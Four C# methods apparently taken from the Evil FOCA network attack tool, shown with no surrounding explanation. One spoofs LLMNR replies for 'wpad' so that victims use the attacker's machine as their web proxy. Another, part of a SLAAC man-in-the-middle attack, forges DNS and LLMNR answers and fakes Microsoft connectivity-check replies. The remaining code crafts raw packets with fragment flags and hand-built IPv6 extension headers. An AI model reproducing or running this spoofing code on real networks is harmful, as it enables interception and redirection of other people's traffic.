public void GenerateLLMNRResponse(Packet packet) { try { LLMNR.LLMNRPacket llmnr = new LLMNR.LLMNRPacket(); llmnr.ParsePacket(((UdpPacket)(packet.PayloadPacket.PayloadPacket)).PayloadData); if (llmnr.Query.Name.ToLower().Equals("wpad") && (llmnr.Query.Type.Value == LLMNR.DNSType.AAAA || llmnr.Query.Type.Value == LLMNR.DNSType.A)) { WinPcapDevice dev = Program.CurrentProject.data.GetDevice(); IPAddress ip = Program.CurrentProject.data.GetIPv6LocalLinkFromDevice(dev); byte[] ipv6Addr = ip.GetAddressBytes(); llmnr.AnswerList.Add(new LLMNR.DNSAnswer() { Class = evilfoca.LLMNR.DNSClass.IN, Name = llmnr.Query.Name, Type = evilfoca.LLMNR.DNSType.AAAA, RData = ipv6Addr, RDLength = (short)ipv6Addr.Length, TTL = 12 }); llmnr.IsResponse = true; EthernetPacket ethDns = new EthernetPacket(dev.MacAddress, ((EthernetPacket)packet).SourceHwAddress, EthernetPacketType.IpV6); IPv6Packet ipv6Dns = new IPv6Packet(ip, ((IPv6Packet)((EthernetPacket)packet).PayloadPacket).SourceAddress); UdpPacket udpDns = new UdpPacket(((UdpPacket)(packet.PayloadPacket.PayloadPacket)).DestinationPort, ((UdpPacket)(packet.PayloadPacket.PayloadPacket)).SourcePort); udpDns.PayloadData = llmnr.BuildPacket(); ipv6Dns.PayloadPacket = udpDns; udpDns.UpdateCalculatedValues(); udpDns.UpdateUDPChecksum(); ipv6Dns.UpdateCalculatedValues(); ethDns.PayloadPacket = ipv6Dns; Program.CurrentProject.data.SendPacket(ethDns); } } catch (Exception) { } }
private void DNSCheck(Packet p) { EthernetPacket ethernet = (EthernetPacket)p; if (p.PayloadPacket.PayloadPacket is UdpPacket) { UdpPacket udp = p.PayloadPacket.PayloadPacket as UdpPacket; attacks.Where(a => a.attackType == AttackType.SlaacMitm).ToList().ForEach(currentAttack => { MitmAttack mitmAttack = currentAttack as MitmAttack; if (p.PayloadPacket is IPv6Packet) { switch (udp.DestinationPort) { case 53: Heijden.DNS.Response response = new Heijden.DNS.Response(new IPEndPoint(IPAddress.Parse("1.2.3.4"), 53), udp.PayloadData); var aaaaDns = (from q in response.Questions where q.QType == Heijden.DNS.QType.AAAA || q.QType == Heijden.DNS.QType.A select q).ToList(); //Para mostrar la pelotita de conexión a internet OK, respondemos al paquete Teredo de Microsoft en formato A. var aTeredoDns = (from q in response.Questions where q.QType == Heijden.DNS.QType.A && (q.QName.ToLower().Contains("teredo") || q.QName.ToLower().Contains("msftncsi")) select q).ToList(); if (aaaaDns != null && aaaaDns.Count > 0) { DNS.IPv6Query query = new DNS.IPv6Query(udp.PayloadData); string q = query.name; IPAddress[] ips = Dns.GetHostAddresses(q); DNS.IPv6Response resp = new DNS.IPv6Response(DNS.IPv6Query.Type.Ipv6, query.transID, query.nameDnsFormat, ips[0]); byte[] respByteAr = resp.GeneratePacket(); EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4); IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress); UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort); udpDns.PayloadData = respByteAr; ipv6Dns.PayloadPacket = udpDns; ethDns.PayloadPacket = ipv6Dns; udpDns.UpdateCalculatedValues(); udpDns.UpdateUDPChecksum(); ipv6Dns.UpdateCalculatedValues(); Program.CurrentProject.data.SendPacket(ethDns); } else if (aTeredoDns != null && aTeredoDns.Count > 0) { DNS.IPv6Query query = new DNS.IPv6Query(udp.PayloadData); string q = query.name; IPAddress[] ips = Dns.GetHostAddresses(q); DNS.IPv6Response resp = new DNS.IPv6Response(DNS.IPv6Query.Type.Ipv4, query.transID, query.nameDnsFormat, ips[0]); byte[] respByteAr = resp.GeneratePacket(); EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4); IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress); UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort); udpDns.PayloadData = respByteAr; ipv6Dns.PayloadPacket = udpDns; ethDns.PayloadPacket = ipv6Dns; udpDns.UpdateCalculatedValues(); udpDns.UpdateUDPChecksum(); ipv6Dns.UpdateCalculatedValues(); Program.CurrentProject.data.SendPacket(ethDns); } break; case 5355: LLMNR.LLMNRPacket llmnr = new LLMNR.LLMNRPacket(); llmnr.ParsePacket(udp.PayloadData); if (llmnr.Query.Type.HasValue && llmnr.Query.Type.Value == LLMNR.DNSType.AAAA) { IPAddress[] ips = (from ip in Dns.GetHostAddresses(llmnr.Query.Name) where ip.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork select ip).ToArray(); byte[] ipv6Addr = new byte[] { 0x00, 0x64, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xff, (byte)ips[0].GetAddressBytes()[0], (byte)ips[0].GetAddressBytes()[1], (byte)ips[0].GetAddressBytes()[2], (byte)ips[0].GetAddressBytes()[3] }; llmnr.AnswerList.Add(new LLMNR.DNSAnswer() { Class = evilfoca.LLMNR.DNSClass.IN, Name = llmnr.Query.Name, Type = evilfoca.LLMNR.DNSType.AAAA, RData = ipv6Addr, RDLength = (short)ipv6Addr.Length }); EthernetPacket ethDns = new EthernetPacket(localPhysicalAddress, ethernet.SourceHwAddress, EthernetPacketType.IpV4); IPv6Packet ipv6Dns = new IPv6Packet(((IPv6Packet)p.PayloadPacket).DestinationAddress, ((IPv6Packet)p.PayloadPacket).SourceAddress); UdpPacket udpDns = new UdpPacket(udp.DestinationPort, udp.SourcePort); udpDns.PayloadData = llmnr.BuildPacket(); ipv6Dns.PayloadPacket = udpDns; ethDns.PayloadPacket = ipv6Dns; udpDns.UpdateCalculatedValues(); udpDns.UpdateUDPChecksum(); ipv6Dns.UpdateCalculatedValues(); Program.CurrentProject.data.SendPacket(ethDns); } break; default: break; } } }); } }
public static Packet CreatePacket(Param param) { Packet ret = null; //create layer 4 if (param.packetType == Param.PacketType.TCP) { TcpPacket tcpPacket = new TcpPacket(param.sPort, param.dPort); tcpPacket.AllFlags = param.tcpFlag; if (param.dIP.ToString().Contains(".")) { IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP); if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; } ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4); ipPacket.PayloadPacket = tcpPacket; tcpPacket.PayloadData = param.payload; ret.PayloadPacket = ipPacket; ipPacket.UpdateCalculatedValues(); ipPacket.UpdateIPChecksum(); tcpPacket.Checksum = (ushort)tcpPacket.CalculateTCPChecksum(); } else { IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP); ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6); ipPacket.PayloadPacket = tcpPacket; tcpPacket.PayloadData = param.payload; ret.PayloadPacket = ipPacket; } } else if (param.packetType == Param.PacketType.UDP) { UdpPacket udpPacket = new UdpPacket(param.sPort, param.dPort); if (param.dIP.ToString().Contains(".")) { IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP); if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; } ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4); ipPacket.PayloadPacket = udpPacket; udpPacket.PayloadData = param.payload; udpPacket.UpdateUDPChecksum(); ipPacket.PayloadLength = (ushort)(ipPacket.PayloadLength + param.payload.Length); ipPacket.UpdateIPChecksum(); ret.PayloadPacket = ipPacket; } else { IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP); ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6); ipPacket.PayloadPacket = udpPacket; udpPacket.PayloadData = param.payload; udpPacket.UpdateUDPChecksum(); ipPacket.PayloadLength = (ushort)(ipPacket.PayloadLength + param.payload.Length); ret.PayloadPacket = ipPacket; } } else if (param.packetType == Param.PacketType.ICMP) { ICMPv4Packet icmpPacket = new ICMPv4Packet(new ByteArraySegment(new byte[32])); if (param.type != 0 && param.code != 0) { icmpPacket.TypeCode = (ICMPv4TypeCodes)((param.type * 256) + (param.code)); } else if (param.type != 0) { icmpPacket.TypeCode = (ICMPv4TypeCodes)((param.type * 256)); } else { icmpPacket.TypeCode = ICMPv4TypeCodes.EchoRequest; } IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP); if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; } ipPacket.PayloadPacket = icmpPacket; ipPacket.Checksum = ipPacket.CalculateIPChecksum(); ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4); ret.PayloadPacket = ipPacket; } else if (param.packetType == Param.PacketType.ICMPv6) { ICMPv6Packet icmpv6Packet = CreateICMPv6Packet(param); IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP); ipPacket.PayloadPacket = icmpv6Packet; ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6); ret.PayloadPacket = ipPacket; } else if (param.packetType == Param.PacketType.IP) { if (param.dIP.ToString().Contains(".")) { ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV4); IPv4Packet ipPacket = new IPv4Packet(param.sIP, param.dIP); if (param.IPv4Frag) { ipPacket.FragmentFlags = (int)1; } ipPacket.Protocol = param.IPProtocol; ipPacket.PayloadData = param.payload; ipPacket.UpdateCalculatedValues(); ret.PayloadPacket = ipPacket; ipPacket.UpdateIPChecksum(); } else { ret = new EthernetPacket(param.sMAC, param.dMAC, EthernetPacketType.IpV6); //if extension headers were not specified, just put the payload if (param.ExtentionHeader.Count == 0) { IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP); ipPacket.Protocol = param.IPProtocol; ipPacket.PayloadData = param.payload; ipPacket.PayloadLength = (ushort)param.payload.Length; ipPacket.UpdateCalculatedValues(); ret.PayloadPacket = ipPacket; } else { ret = PacketFactory.CreateEHPacket(param, (EthernetPacket)ret); } ret.UpdateCalculatedValues(); } } else if (param.packetType == Param.PacketType.EtherType) { ret = new EthernetPacket(param.sMAC, param.dMAC, param.EtherTypeProtocol); byte[] etherBuffer = (new byte[64]); var payload = new byte[etherBuffer.Length + (param.payload).Length]; etherBuffer.CopyTo(payload, 0); (param.payload).CopyTo(payload, etherBuffer.Length); ret.PayloadData = payload; ret.UpdateCalculatedValues(); } return ret; }
//terrible hack to get extension headers working private static EthernetPacket CreateEHPacket(Param param, EthernetPacket ret) { IPv6Packet ipPacket = new IPv6Packet(param.sIP, param.dIP); ipPacket.Protocol = (IPProtocolType)param.ExtentionHeader[0]; param.ExtentionHeader.RemoveAt(0); //need to find out what is the last packet so that we can decide on the length of the packet IPProtocolType endEH = param.ExtentionHeader[param.ExtentionHeader.Count - 1]; int lastHeaderLength = 0; switch (endEH) { case IPProtocolType.TCP: lastHeaderLength = 20; break; case IPProtocolType.UDP: lastHeaderLength = 8; break; case IPProtocolType.ICMP: lastHeaderLength = 8; break; default: lastHeaderLength = 64; break; } //calculate the Extension header size int EHSize = 0; foreach (IPProtocolType eh in param.ExtentionHeader) { if (eh == IPProtocolType.FRAGMENT) { EHSize += 8; } else { EHSize += 24; } } if (ipPacket.Protocol == IPProtocolType.FRAGMENT) { EHSize -= 16; } byte[] tempPayload = new byte[EHSize + param.payload.Length + lastHeaderLength]; param.payload.CopyTo(tempPayload, EHSize + lastHeaderLength); int loc = 0; byte previous = (byte)ipPacket.Protocol; foreach (byte eh in param.ExtentionHeader) { tempPayload.SetValue((byte)eh, loc); tempPayload.SetValue((byte)2, loc + 1); if ((IPProtocolType)previous == IPProtocolType.FRAGMENT) { loc += 8; } else { loc += 24; } previous = eh; } //set the port if the last EH is tcp or udp if (endEH == IPProtocolType.TCP || endEH == IPProtocolType.UDP) { //set the port numbers tempPayload.SetValue((byte)(param.sPort >> 8), loc); tempPayload.SetValue((byte)param.sPort, loc + 1); tempPayload.SetValue((byte)(param.dPort >> 8), loc + 2); tempPayload.SetValue((byte)param.dPort, loc + 3); } if (endEH == IPProtocolType.TCP) { tempPayload.SetValue((byte)0x50, loc + 12); } else if (endEH == IPProtocolType.UDP) { //set the length of the payload Int16 length = (Int16)(lastHeaderLength + param.payload.Length); BitConverter.GetBytes(length).CopyTo(tempPayload, loc + 5); tempPayload.SetValue((byte)0x12, loc + 6); tempPayload.SetValue((byte)0x34, loc + 7); } //set the tcp flags if they are TCP if (endEH == IPProtocolType.TCP) { tempPayload.SetValue((byte)param.tcpFlag, loc + 13); } ipPacket.PayloadData = tempPayload; ipPacket.PayloadLength = (ushort)tempPayload.Length; ipPacket.UpdateCalculatedValues(); ret.PayloadPacket = ipPacket; return ret; }